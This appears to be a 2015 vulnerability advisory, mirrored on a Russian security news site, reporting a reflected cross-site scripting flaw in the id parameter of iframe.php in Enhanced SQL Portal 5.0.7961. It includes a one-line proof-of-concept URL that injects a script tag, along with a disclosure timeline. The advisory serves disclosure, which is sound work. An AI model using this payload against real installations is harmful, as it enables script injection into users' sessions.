Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Xloner v3.1.2 wordpress plugin authenticated command execution and XSS

  CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted Contact Form Wordpress Plugin v1.0.4

  AnimaGallery 2.6 (theme and lang cookie parameter) Local File Include Vulnerability

  Symphony CMS 2.6.2

From:apparitionsec_(at)_gmail.com <apparitionsec_(at)_gmail.com>
Date:8 июня 2015 г.
Subject:Enhanced SQL Portal 5.0.7961 XSS Vulnerability



[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt



Vendor:
www.eliacom.com
www.eliacom.com/mysql-gui-download.php



Product:
Enhanced SQL Portal 5.0.7961 web based MySQL administration application.



Advisory Information:
================================================
Enhanced SQL Portal 5.0.7961 XSS Vulnerability




Vulnerability Details:
=====================
iframe.php contains an XSS vulnerability



Exploit code(s):
===============


http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.
php?id="/><script>alert(666)</script>
 


Disclosure Timeline:
=========================================================


Vendor Notification: May 28, 2015
June 2, 2015 : Public Disclosure


Severity Level:
=========================================================
Med



Description:
==========================================================

Request Method(s):
                               [+] GET

Vulnerable Product:
                               [+] Enhanced SQL Portal 5.0.7961

Vulnerable Parameter(s):
                               [+] id

Affected Area(s):
                               [+] iframe

===============================================================

(hyp3rlinx)

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород